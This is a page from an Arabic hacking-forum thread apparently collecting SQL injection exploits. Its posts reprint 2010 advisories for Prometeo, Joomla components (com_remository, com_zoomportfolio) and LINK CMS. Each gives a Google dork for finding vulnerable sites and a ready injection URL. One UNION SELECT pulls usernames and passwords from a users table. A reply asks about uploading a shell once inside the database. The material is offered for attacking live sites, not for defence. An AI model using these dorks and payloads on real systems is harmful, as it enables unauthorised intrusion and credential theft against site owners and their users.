التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات
تحديث الصفحة √مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection--
التعليمات التقويم مشاركات اليوم البحث

إضافة رد
صفحة 2 من 2 1 2
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-11-2010, 01:32 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Master vbspiders
 

 
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road
افتراضي

[align=center]KALASH3R
لا اريد ردود حانبية
تحياتي[/align]



التوقيع

^_^

 

   

رد مع اقتباس
قديم 08-11-2010, 01:57 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية PrInCe Of PeRsIa
 

 
 
إحصائية العضو








PrInCe Of PeRsIa غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى PrInCe Of PeRsIa

 

 

إحصائية الترشيح

عدد النقاط : 10
PrInCe Of PeRsIa is on a distinguished road
افتراضي

thanxxx so much mohammad
keep ur job like this

التوقيع

 

   

رد مع اقتباس
قديم 08-27-2010, 02:32 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Master vbspiders
 

 
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road
Post Prometeo v1.0.65 SQL Injection Vulnerability

كود PHP:
                      ****     **    ********   **********                     /**/**   /**   **//////   /////**///                      /**//**  /**  /**             /**                         /** //** /**  /*********      /**                         /**  //**/**  ////////**      /**                         /**   //****         /**      /**                         /**    //***   ********       /**                         //      ///   ////////        //
 
                          =================================                  
Prometeo (vers1.0.65)  -SQLi Vulnerability-                          =================================
 
-Vulnerability IDLD3-ProductPrometeo-VendorPrometeo (http://www.infomedia2000.it/prometeo/)-Vulnerability Type: SQL Injection-Status: Unfixed-Risk level: High-Credit: Network Security (http://www.netw0rksecurity.net/)
 
-Vulnerability Details:User can execute arbitrary JavaScript code within the vulnerable application.An attacker can use browser to exploit this vulnerability.
 
-Google Dorkinurl:categoria.php?IDcomune
 
-Example:
http://server/categoria.php?ID=132%20and%201=2%20union%20select%201,concat(nome,0x3a,password),3,4,5,6,7,8,9,10,null,12,13,14,15,16,17%20from%20users--
 
# Netw0rkSecurity.net [2010-08-26]                 

Comments 
التوقيع

^_^

 

   

رد مع اقتباس
قديم 08-27-2010, 02:35 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Master vbspiders
 

 
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road
Post Joomla Component (com_remository) SQL Injection Vulnerability

كود PHP:
############################## ALGERIAN HAX0RZ #############################..
# Exploit Title: [title]
# Date: 24/08/2010
# Author: TopSat13
# Software Link: http://remository.com/downloads/
# Version: 1
# Tested on: [win sp3 os]
# CVE : [if exists]
####
#              oooo[ Software Information ]oooo
# Author: TopSat13
#
# Email: TopSat13@live.fr
#
# Vendor : http://remository.com/
#
# title : Joomla Component (com_remository) SQL Injection Vulnerability
#
# Dork :"inurl:index.php?option=com_remository"
#
####           oooo[ vuln & exploit & Demo ]oooo
#
# vuln: site.com/index.php?option=com_remository&Itemid=[sql]
# or
# vuln: site.com/index.php?option=c&Itemid=183&func=selectcat&cat=[sql]
#
# exploit:
#
# 0nligne demo :
http://www.site.com/portail/index.php?option=com_remository&Itemid=183&func=selectcat&cat=3'
#
#
####          oooo[ Greeeeeeeeeeeeeeeeeeetz ]oooo
#
# to : ALLAH , All my freands , all musulmens hackerz
#
############################## ALGERIAN H4X0RZ
################################.. 
التوقيع

^_^

 

   

رد مع اقتباس
قديم 08-27-2010, 02:37 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Master vbspiders
 

 
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road
Post Joomla Component (com_zoomportfolio) SQL Injection Vulnerability

كود PHP:
---------------------------------------------------------------------------------
Joomla Component Zoom Portfolio (idRemote Sql Injection
---------------------------------------------------------------------------------
 
Author      Chip D3 Bi0s
Group       LatinHackTeam
Email msn chipdebios@gmail.com
Date        23 August 2010
Critical Lvl    Moderate
Impact      Exposure of sensitive information
Where       From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application Zoom Portfolio --Joomla Portfolio Component
version     1.5
Price       : $20.00
Developer   EGBZOOM
License     GPLv2 or later           type  Commercial
Date Added  21 August 2010
Download    http://www.egbzoom.com/joomla-portfolio-component.html
 
Description     :
 
Zoom Portfolio enables you to display your portfolio in a "directory listing-like
presentation" with minimum effort.The Component has features like add category
add images,settings,add portfolio .Zoom Portfolio includes automatic thumbnail creation,
captioningsearching and more.It also includes the ability to modify and delete any
of your existing pages.
The Zoom Portfolio is an amazing example of what can be done online with your online
presenceIt is directed at artists of all walks of lifeit is very easy to install
and customize, and it is just simply stunning.
 
-------------------------
 
How to exploit
 
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
 
-------------------------
 
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++ 
التوقيع

^_^

 

   

رد مع اقتباس
قديم 08-27-2010, 02:39 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية Master vbspiders
 

 
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road
Post LINK CMS SQL Injection Vulnerability

كود PHP:
# Exploit Title: LINK CMS.SQL Injection Vulnerability
# Date: 2010-08-23
# Author: hacker@sr.gov.yu
# Software Link:
http://www.link-softsolutions.com/SoftLink-Content-Management-System---CMS_20_1
# Version: n/a
 
 
####################################################################
.:. Author hacker@sr.gov.yu
.:. Contacthacker@evilzone.orghacker@sr.gov.yu(MSN)
.:. Home www.evilzone.orgwww.pentesting-rs.org
.:. Script LINK CMS
.:. Bug Type Sql Injection
.:. RiskHigh
.:. Tested on Windows Linux
 ####################################################################
 
===[ Exploit ]===
 
.:. It was found that LINK CMS does not validate properly the "IDStranicaPodaci"
parameter value.
 
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=63[SQLi]
 
===[ Example ]===
 
http://server/navigacija.php?jezik=lat&IDMeniGlavni=6&IDMeniPodSekcija=45&IDMeniPodSekcija3=6&IDStranicaPodaci=-63
UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
 
 
===[ Solution ]===
 
.:. Input validation of "IDStranicaPodaci" parameter should be corrected.
 
 
Greetz to ALL EVILZONE.org && pentesting-rs.org members!!!
Pozdrav za sve iz Srbije!!! :-))) 
التوقيع

^_^

 

   

رد مع اقتباس
قديم 08-28-2010, 06:04 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية MadaRaXP
 

 
 
إحصائية العضو







MadaRaXP غير متواجد حالياً

إرسال رسالة عبر MSN إلى MadaRaXP

 

 

إحصائية الترشيح

عدد النقاط : 10
MadaRaXP is on a distinguished road
افتراضي

perl langugue ?
its need Some Application Yo Run

   

رد مع اقتباس
قديم 12-01-2010, 03:19 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية winfil
 

 
 
إحصائية العضو





winfil غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
winfil is on a distinguished road
افتراضي

thnk you so much homie at last i found smth'n more stable .i want to ask you if i can upload my shell when i enter the db & other question can i use ""havij whith those exploits

   

رد مع اقتباس
إضافة رد
صفحة 2 من 2 1 2

مواقع النشر (المفضلة)

« الموضوع السابق | الموضوع التالي »

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ترتيب الخطوات في حقن قواعد البيانات SQL Injection KaLa$nikoV SQL قواعد البيانات 127 05-03-2017 08:12 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث} Master vbspiders SQL قواعد البيانات 280 08-24-2015 04:10 AM
Thumbs up into_outfile in SQL Injection شرح طريقة رفع شل عن طريق ثغرات SQL Injection Black-FoG SQL قواعد البيانات 73 03-14-2014 09:08 PM
[Style] : ¨°•√♥ كل عام وانتم بخير العيدية استايل العيد الازرق الاحترافي من سنبوك لتصميم ♥√•°¨ support قسم ستآيلات الـ vB 0 09-18-2009 11:52 PM


الساعة الآن 10:03 PM

:: vBspiders.Com :: RSS Feeds - راسلـنا - :: vBspiders.Com :: - الأعلى

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0